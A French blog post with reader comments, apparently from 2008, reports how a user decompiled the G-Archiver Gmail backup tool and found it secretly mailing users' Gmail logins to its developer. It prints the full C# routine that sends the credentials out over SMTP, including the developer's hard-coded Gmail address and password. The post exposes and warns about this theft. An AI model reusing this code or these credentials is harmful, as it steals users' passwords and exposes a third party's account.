Un programmeur reconverti en voleur de mot de passe Gmail
Par Korben | Nb visites : 776
Article plutôt amusant (enfin, ça dépend du point de vue) chez Coding Horror ou on apprend qu’un mec qui cherchait une bonne solution pour faire un backup de son compte Gmail sur son disque dur a acheté le logiciel G-Archiver au prix de 30 $
Et comme ce petit gars est un curieux, il a commencé à fouiller le code (compilé) du logiciel en utilisant Reflector (un analyseur de classes pour les programmes .NET) et à découvert que le créateur du logiciel, John Terry avait codé en dur son propre nom d’utilisateur gmail et son mot de passe dans l’application.
Voici le code :
public static void CheckConnection(string a, string b)
{
try
{
MailMessage message = new MailMessage();
message.To.Add("JTerry79@gmail.com");
message.From = new MailAddress("JTerry79@gmail.com", "JTerry", Encoding.UTF8);
message.Subject = "Account";
message.SubjectEncoding = Encoding.UTF8;
message.Body = "Username: " + a;
message.Body = message.Body + "\r\nPassword: " + b;
message.BodyEncoding = Encoding.UTF8;
message.IsBodyHtml = false;
message.Priority = MailPriority.High;
SmtpClient client = new SmtpClient();
client.Credentials = new NetworkCredential("JTerry79@gmail.com", "bilal482");
client.Port = 0x24b;
client.Host = "smtp.gmail.com";
client.EnableSsl = true;
client.Send(message);
}
catch (Exception)
{
}
}
Le petit curieux s’est donc connecté au compte gmail du John Terry et a constaté avec horreur ceci :
Plus de 1700 emails contenant les passwords de tous les gens qui ont utilisé ce logiciel de backup Gmail… Pas de doute ici, le programmeur John Terry est un affreux jojo !!
Le petit curieux ne l’a pas non plus joué très fine. Il a carrément supprimé tous les messages, a changé le mot de passe du compte Gmail puis a contacté Google pour faire fermer ce compte… Pourquoi je dis qu’il ne l’a pas joué très fine ? Car il a détruit les preuves…
Que faire quand on découvre ce genre de chose ? Agir au plus rapide pour le bien de tous ? Ou prévenir la police ?
N’empêche, ça fait réfléchir sur l’éthique plus que scrupuleuse de certains programmeurs. Vous serez peut être plus prudents à l’avenir avant de confier vos identifiant à n’importe quelle application (freeware ou non).
Enfin, de là à décompiler tout ce qui bouge, faut pas abuser quand même…Quoi que…
Peut être que chez Webrankinfo, ils utilisaient aussi ce soft ?
A bon entendeur…
Je vous recommande aussi la lecture des sujets suivants
- Comment cracker un mot de passe sous Linux ?
- Insérer de jolis petits smileys animés dans Gmail
- Laissez un message au propriétaire d’une adresse IP
- Utilisez Gmail comme client mail par défaut dans Firefox
- Le mot de passe root de l’Iphone
- Importer ses mails Thunderbird sous Gmail
- Rechercher / Remplacer les doigts dans le nez sous Linux avec rpl
- Google serait en train de passer les comptes Gmail a 9 Gb
- Comment bien utiliser l’espace disque que vous offre Google sur Gmail
- LogMeIn Express
Geoffrey Dorne
wow wow wow ! Vous croyez qu’il y a des addons firefox qui font la même chose ? (même si Korben en a déjà parlé sur son blog biensûr :-p)
Posté le 8 mars 2008 à 17:42:34
admin
@Geoffrey : Euuuh, ouais, j’en ai déjà parlé aussi…
Posté le 8 mars 2008 à 17:49:54
Spi@n
J’utilse g-archiver, j’risque quoi ?
ps: 4 000 000, tu m’étonnes, il est terrible ce site.
Posté le 8 mars 2008 à 18:00:19
pickupjojo
Si vous voulez j’ai codé un programme pour consulter votre compte en banque en ligne, ça vous dit ?
Posté le 8 mars 2008 à 18:03:23
admin
@Spi@n : Change ton mot de passe gmail…
Posté le 8 mars 2008 à 18:03:52
Vorenus
Même si le gars qui a découvert cette fraude a effacé les preuves que sont les e-mails, il reste toujours la plus grosse : en effet, le programme est là et le code aussi, donc le programmeur peut toujours être inquiété… cela dit, ce n’est pas très malin de sa part en effet.
Le plus problématique, c’est que même les gens avec un firewall logiciel monitorant les connections vers l’extérieur ont du se faire tromper : après tout, il semble que pour un logiciel de backup d’e-mails hebergés, il n’y ait rien d’étonnant à ce que le programme se connecte sur les serveurs du fournisseur (même si smtp.gmail.com tire un peu l’oeil évidemment, mais pour 80% des gens, ça passe)…
+1 pour l’open-source (même si .NET sans obfuscateur, c’est presque semblable à de l’open-source apparemment
).
Posté le 8 mars 2008 à 18:16:13
Jeromecold’s Blog » Archives du Blog » Un gmailleur gmaillisé!
[...] Source: Chez Korben (que je félicite pour son nombre de visiteurs): http://www.korben.info/un-pr…; [...]
Posté le 8 mars 2008 à 19:33:35
jeromecold
Hahaha, pas drôle mais quand même! C’est bien pensé comme logiciel, il était en vente de puis combien de temps??
Bravo Korben pour ton méga-compteur!
Posté le 8 mars 2008 à 19:35:09
Baptiste
A mon avis tes emails sont pas supprimés dès que tu clic sur delete…
Posté le 8 mars 2008 à 21:03:54
Diti
Vous comprendrez maintenant l’intérêt de préférer les logiciels libres aux freewares
!
Posté le 8 mars 2008 à 21:21:39
none
>Diti
>8 mar 2008 Ã 21:21
>Vous comprendrez maintenant lâ??intérêt de préférer les logiciels libres aux freewares !
Oui, mais G-Archiver est un Shareware
Posté le 9 mars 2008 à 00:02:39
Marc B.
Heuuu, je n’ai jamais creusé le point mais…(pourtant pour un admin Exchange je devrais peut-être :$) une boîte comme Google avec un service aussi déployé aujourd’hui… doit bien avoir quelques bandes de sauvegarde où se trouvent les mails de l’affreux jojo… donc si inquiété il est (ce qui serait légitime vous croyez pas ?) j’imagine que la justice serait en droit de demander à Google de restaurer la BAL de M. Curieux (voire M. MalIntentionné)
Je dis ça je dis rien
Posté le 9 mars 2008 à 01:15:46
Diti
@none : Freeware, shareware, c’est sensiblement la même chose au niveau du code : il est fermé.
Posté le 9 mars 2008 à 09:25:45
Le dentiste
Voilà pourquoi, je sniffe toujours la connexion entre mon routeur et mon ordi pour voir ce que les programmes envoient à leur première utilisation xD
… Je dirai : et ce n’est que le premier que l’on découvre…
Le mec de WRI ne se serait pas fait piraté comme cela ?
Posté le 9 mars 2008 à 09:58:16
Olivier Duffez (WebRankInfo)
Impressionnant en effet ! Je n’ai pas utilisé ce logiciel (ni aucun autre lié à Gmail d’ailleurs)
Posté le 9 mars 2008 à 12:40:27
Korben
Salut Olivier,
Pas cool ce qui t’es arrivé, je suis content que ça se termine bien. Faudra m’expliquer cette histoire de 0day
Moi du coup, avec cette histoire, j’ai changé tous mes passwords 
(parano inside)
Posté le 9 mars 2008 à 12:50:42
Vincent Voyer
Voilà un développeur qui va avoir du mal à trouver du travail dans l’avenir …
Posté le 9 mars 2008 à 14:55:49
Le dentiste
Arf, donc il y a un autre problème alors ?…
Une XSS ? (cela me parait assez probable…)
Posté le 9 mars 2008 à 15:08:21
SDF
Bonjour je voulais savoir quel type de programmes il faut utiliser pour sniffer les entrées et sorties de son ordi par un logiciel ?
Posté le 9 mars 2008 à 16:37:58
admin
ethereal
Posté le 9 mars 2008 à 17:27:24
babelkot
Je ne me sers pas de G-archiver et je suis un des 4.000.000 de visiteurs de Korben…le bonheur …:)
Posté le 10 mars 2008 à 00:35:03
Nas
Moi je trouve cela tout simplement scandaleux !
Y a des mecs avec l’esprit vraiment tordu !
Posté le 10 mars 2008 à 07:48:53
Nico
Espéront que ce John Terry sera attaqué par Google, et surement ruiné ainsi que sa société.
Posté le 10 mars 2008 à 09:42:01
Gflippe
[...] à un site ouvert sur un onglet de récupérer les infos d’une session Gmail ouverte ? Logiciel tiers effectuant des trucs dans votre dos ? Toujours est il que le piratage a bien lieu avec toutes les [...]
Posté le 14 mars 2008 à 11:38:03
what's new?
Actu du jour: quelques liens…
Elections municipales : il faut voter !
Barack Obama remporte les caucus du Wyoming : la bataille avec Clinton continue … pour le meilleur ou pour le pire?
Chirac crée une fondation : blanchissement d’argent en vue ou réel intérêt pour…
Posté le 9 juin 2008 à 02:04:04
Hervé
Plus de preuve? Et la capture d’écran elle sort d’où??
Posté le 29 juillet 2008 à 20:49:19